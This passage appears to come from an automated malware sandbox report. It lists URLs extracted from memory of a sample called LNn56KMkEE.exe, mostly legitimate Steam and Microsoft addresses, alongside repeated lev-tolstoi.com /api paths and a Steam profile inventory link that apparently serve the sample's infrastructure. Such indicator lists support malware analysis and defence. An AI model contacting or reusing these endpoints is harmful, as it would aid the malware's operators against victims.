                                                                                                      https://s.ytimg.com;LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/css/LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://steam.tv/LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://lev-tolstoi.com/(aLNn56KMkEE.exe, 00000000.00000003.1752668180.0000000000FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843987961.0000000005891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enLNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://lev-tolstoi.com/LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929021676.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872487701.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1887045609.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924201177.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798241314.0000000005895000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924363076.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798154813.0000000005895000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://store.steampowered.com/privacy_agreement/LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://store.steampowered.com/points/shop/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaLNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843987961.0000000005891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://ocsp.rootca1.amazontrust.com0:LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://help.steampowered.cLNn56KMkEE.exefalse
                                                                                                                                        unknown
                                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016LNn56KMkEE.exe, 00000000.00000003.1798001188.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776244890.00000000058DE000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798274391.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798111491.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776196742.00000000058E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aLNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://sketchfab.comLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.ecosia.org/newtab/LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://lv.queniujq.cnLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLNn56KMkEE.exe, 00000000.00000003.1819509405.000000000599F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.youtube.com/LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/privacy_agreement/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://lev-tolstoi.com/n7LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1887045609.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924201177.0000000001075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://support.microsofLNn56KMkEE.exe, 00000000.00000003.1776196742.00000000058E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amLNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.google.com/recaptcha/LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://checkout.steampowered.com/LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesLNn56KMkEE.exe, 00000000.00000003.1776244890.00000000058BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?vLNn56KMkEE.exefalse
                                                                                                                                                                          high
                                                                                                                                                                          https://store.steampowered.com/;LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://store.steampowered.com/about/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://steamcommunity.com/my/wishlist/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://lev-tolstoi.com/V7LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://help.steampowered.com/en/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://steamcommunity.com/market/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://store.steampowered.com/news/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://lev-tolstoi.com/es~7LNn56KMkEE.exe, 00000000.00000003.1872487701.0000000001075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://lev-tolstoi.com/apiqLNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=eLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://lev-tolstoi.com/apipLNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.000000000101F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgLNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17LNn56KMkEE.exe, 00000000.00000003.1798001188.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776244890.00000000058DE000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798274391.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798111491.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776196742.00000000058E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://lev-tolstoi.com/apiyLNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://recaptcha.net/recaptcha/;LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://steamcommunity.com/discussions/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://store.steampowered.com/stats/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amLNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://medal.tvLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://broadcast.st.dl.eccdnx.comLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aLNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://store.steampowered.com/steam_refunds/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://lev-tolstoi.com/vo0~LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847242984.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846708407.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872487701.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1887045609.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924201177.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846753898.0000000001073000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                unknown
